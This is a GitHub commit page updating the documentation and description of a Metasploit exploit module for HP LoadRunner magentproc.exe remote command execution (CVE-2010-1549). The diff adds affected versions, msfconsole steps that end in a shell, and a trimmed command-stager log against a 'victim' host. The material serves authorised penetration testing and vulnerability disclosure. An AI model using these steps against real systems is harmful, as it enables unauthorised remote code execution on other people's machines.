Skip to content

Commit b698095

Browse files
h00dieh00die
committed
slight updates to magentproc docs
1 parent d95b333 commit b698095

File tree

2 files changed

+15
-71
lines changed

2 files changed

+15
-71
lines changed

documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md

Lines changed: 11 additions & 67 deletions
Original file line numberDiff line numberDiff line change
@@ -1,29 +1,29 @@
11
HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
22

3-
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default).
3+
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
4+
HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
5+
The service is vulnerable provided the Secure Channel feature is disabled (default).
46

5-
## Vulnerable Application
7+
During testing, additional versions were verified to be vulnerable. The following list documents them:
8+
9+
- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
610

7-
HP LoadRunner 9.50 or below.
11+
## Vulnerable Application
812

9-
Sources unknown - written during blind pentest against remote target.
13+
HP LoadRunner 9.50 or below, or a version documented above.
1014

1115
## Verification Steps
1216

1317
1. Install the application
1418
2. Start msfconsole
1519
3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
16-
4. Do: ```set RHOST victim```
20+
4. Do: ```set RHOST [ip]```
1721
5. Do: ```run```
1822
6. You should get a shell.
1923

20-
## Options
21-
22-
Default RPORT 54345.
23-
2424
## Scenarios
2525

26-
### Win7 OS with unknown vulnerable release of LoadRunner Agent
26+
### Win7 OS with HP LoadRunner 12.53 Community Edition
2727

2828
```
2929
msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
@@ -38,63 +38,7 @@ msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
3838
[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
3939
[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
4040
[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
41-
[*] victim:54345 - Command Stager progress - 8.79% done (8994/102292 bytes)
42-
[*] victim:54345 - Command Stager progress - 10.26% done (10493/102292 bytes)
43-
[*] victim:54345 - Command Stager progress - 11.72% done (11992/102292 bytes)
44-
[*] victim:54345 - Command Stager progress - 13.19% done (13491/102292 bytes)
45-
[*] victim:54345 - Command Stager progress - 14.65% done (14990/102292 bytes)
46-
[*] victim:54345 - Command Stager progress - 16.12% done (16489/102292 bytes)
47-
[*] victim:54345 - Command Stager progress - 17.58% done (17988/102292 bytes)
48-
[*] victim:54345 - Command Stager progress - 19.05% done (19487/102292 bytes)
49-
[*] victim:54345 - Command Stager progress - 20.52% done (20986/102292 bytes)
50-
[*] victim:54345 - Command Stager progress - 21.98% done (22485/102292 bytes)
51-
[*] victim:54345 - Command Stager progress - 23.45% done (23984/102292 bytes)
52-
[*] victim:54345 - Command Stager progress - 24.91% done (25483/102292 bytes)
53-
[*] victim:54345 - Command Stager progress - 26.38% done (26982/102292 bytes)
54-
[*] victim:54345 - Command Stager progress - 27.84% done (28481/102292 bytes)
55-
[*] victim:54345 - Command Stager progress - 29.31% done (29980/102292 bytes)
56-
[*] victim:54345 - Command Stager progress - 30.77% done (31479/102292 bytes)
57-
[*] victim:54345 - Command Stager progress - 32.24% done (32978/102292 bytes)
58-
[*] victim:54345 - Command Stager progress - 33.70% done (34477/102292 bytes)
59-
[*] victim:54345 - Command Stager progress - 35.17% done (35976/102292 bytes)
60-
[*] victim:54345 - Command Stager progress - 36.64% done (37475/102292 bytes)
61-
[*] victim:54345 - Command Stager progress - 38.10% done (38974/102292 bytes)
62-
[*] victim:54345 - Command Stager progress - 39.57% done (40473/102292 bytes)
63-
[*] victim:54345 - Command Stager progress - 41.03% done (41972/102292 bytes)
64-
[*] victim:54345 - Command Stager progress - 42.50% done (43471/102292 bytes)
65-
[*] victim:54345 - Command Stager progress - 43.96% done (44970/102292 bytes)
66-
[*] victim:54345 - Command Stager progress - 45.43% done (46469/102292 bytes)
67-
[*] victim:54345 - Command Stager progress - 46.89% done (47968/102292 bytes)
68-
[*] victim:54345 - Command Stager progress - 48.36% done (49467/102292 bytes)
69-
[*] victim:54345 - Command Stager progress - 49.82% done (50966/102292 bytes)
70-
[*] victim:54345 - Command Stager progress - 51.29% done (52465/102292 bytes)
71-
[*] victim:54345 - Command Stager progress - 52.75% done (53964/102292 bytes)
72-
[*] victim:54345 - Command Stager progress - 54.22% done (55463/102292 bytes)
73-
[*] victim:54345 - Command Stager progress - 55.69% done (56962/102292 bytes)
74-
[*] victim:54345 - Command Stager progress - 57.15% done (58461/102292 bytes)
75-
[*] victim:54345 - Command Stager progress - 58.62% done (59960/102292 bytes)
76-
[*] victim:54345 - Command Stager progress - 60.08% done (61459/102292 bytes)
77-
[*] victim:54345 - Command Stager progress - 61.55% done (62958/102292 bytes)
78-
[*] victim:54345 - Command Stager progress - 63.01% done (64457/102292 bytes)
79-
[*] victim:54345 - Command Stager progress - 64.48% done (65956/102292 bytes)
80-
[*] victim:54345 - Command Stager progress - 65.94% done (67455/102292 bytes)
81-
[*] victim:54345 - Command Stager progress - 67.41% done (68954/102292 bytes)
82-
[*] victim:54345 - Command Stager progress - 68.87% done (70453/102292 bytes)
83-
[*] victim:54345 - Command Stager progress - 70.34% done (71952/102292 bytes)
84-
[*] victim:54345 - Command Stager progress - 71.81% done (73451/102292 bytes)
85-
[*] victim:54345 - Command Stager progress - 73.27% done (74950/102292 bytes)
86-
[*] victim:54345 - Command Stager progress - 74.74% done (76449/102292 bytes)
87-
[*] victim:54345 - Command Stager progress - 76.20% done (77948/102292 bytes)
88-
[*] victim:54345 - Command Stager progress - 77.67% done (79447/102292 bytes)
89-
[*] victim:54345 - Command Stager progress - 79.13% done (80946/102292 bytes)
90-
[*] victim:54345 - Command Stager progress - 80.60% done (82445/102292 bytes)
91-
[*] victim:54345 - Command Stager progress - 82.06% done (83944/102292 bytes)
92-
[*] victim:54345 - Command Stager progress - 83.53% done (85443/102292 bytes)
93-
[*] victim:54345 - Command Stager progress - 84.99% done (86942/102292 bytes)
94-
[*] victim:54345 - Command Stager progress - 86.46% done (88441/102292 bytes)
95-
[*] victim:54345 - Command Stager progress - 87.92% done (89940/102292 bytes)
96-
[*] victim:54345 - Command Stager progress - 89.39% done (91439/102292 bytes)
97-
[*] victim:54345 - Command Stager progress - 90.86% done (92938/102292 bytes)
41+
...snip...
9842
[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
9943
[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
10044
[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)

modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -14,9 +14,10 @@ def initialize(info={})
1414
'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
1515
'Description' => %q{
1616
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
17-
and also HP Performance Center before 9.50. By sending a specially crafted packet, an
18-
attacker can execute commands remotely. The service is vulnerable provided the Secure
19-
Channel feature is disabled (default).
17+
and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
18+
also most likely vulneable if the (non-default) SSL option is turned off.
19+
By sending a specially crafted packet, an attacker can execute commands remotely.
20+
The service is vulnerable provided the Secure Channel feature is disabled (default).
2021
},
2122
'License' => MSF_LICENSE,
2223
'Author' =>
@@ -29,7 +30,6 @@ def initialize(info={})
2930
['CVE', '2010-1549'],
3031
['ZDI', '10-080'],
3132
['BID', '39965'],
32-
#['OSVDB', ''], # ?
3333
['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
3434
],
3535
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },

0 commit comments

Comments
 (0)